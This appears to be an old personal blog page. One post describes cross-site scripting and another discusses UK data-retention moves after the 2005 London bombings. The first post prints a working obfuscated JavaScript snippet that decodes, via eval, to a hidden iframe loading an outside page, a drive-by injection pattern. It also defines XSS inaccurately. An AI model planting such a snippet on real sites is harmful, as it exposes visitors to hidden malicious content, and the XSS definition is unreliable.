XSS: My first encounter

Had my first brush with Cross-Site-Scripting (XSS) a few days ago. Exactly what is XSS? Well, it's putting external links onto a website, as simple as that. The power with XSS is that that linked site could contain trojans!

This is yet one more way a hacker penetrates our PCs. They insert XSS links into your favourite (or popular sites) site. They link to websites that do contain trojans which then infect you. However, if u're not protected, the infection is invisible to you. Even if it's not successful you point the finger at your fav site cuz the trojan triggered when u visited it. Clever? Ingenious.

Oh, one more thing, check this out:

<script>
s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof
(!xjeui>2!ifjhiu>2!tsd>(iuuq;00jngsff/butqbdf/dpn0gsff/iunm(
?=0jgsbnf?#*<';o='';for(i=0;i<116;i++){
o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);
<script>

Nonsense? Nope, if u decode the simple Javascript, it's actually an IFRAME link to another site! Yep, XSS in action.

All eyes on London, no more civil liberties?

All eyes are currently on London now, with them winning the 2012 Olympics bid then the bomb explosions during morning rush hour. KNN the bastards I wonder if Paris had won, would bombs explode there too? How about the other countries? Are these countries looking for unexploded bombs????

Anyway after the whole incident, now the UK police are investigating and are not leaving any stone unturned. Check this article from The Register out:

Meanwhile, UK authorities have begun contacting ISPs as they looks for leads on the bombers. El Reg has received reports that individuals trying to cancel accounts with providers have been told they can‘t, as security services have already told providers to freeze all accounts.

The Observer reported today that authorities had asked service providers to provide any information deemed relevant. At present there is no requirement to comply, but this may not be the case for long.

The Observer said UK home secretary, Charles Clarke, will this week propose new data retention measures covering mobile phone and internet service providers at an emergency meeting of European Union interior ministers on the implications of the bombings. Clarke will also apply pressure on areas such as law enforcement databases, tracking passports and movements of explosives. Clarke has said he believes authorities might have been able to prevent the bombings if they had access to such data.

Clarke’s efforts could revitalise EU efforts to require providers to retain data for at least years. As of last month the initiative seemed moribund, as member states pushed the program while the EU parliament battled against it.

Shocking... how far will this go? I wonder what the US government has in this area? Maybe they have super computers already doing all this?

What about here?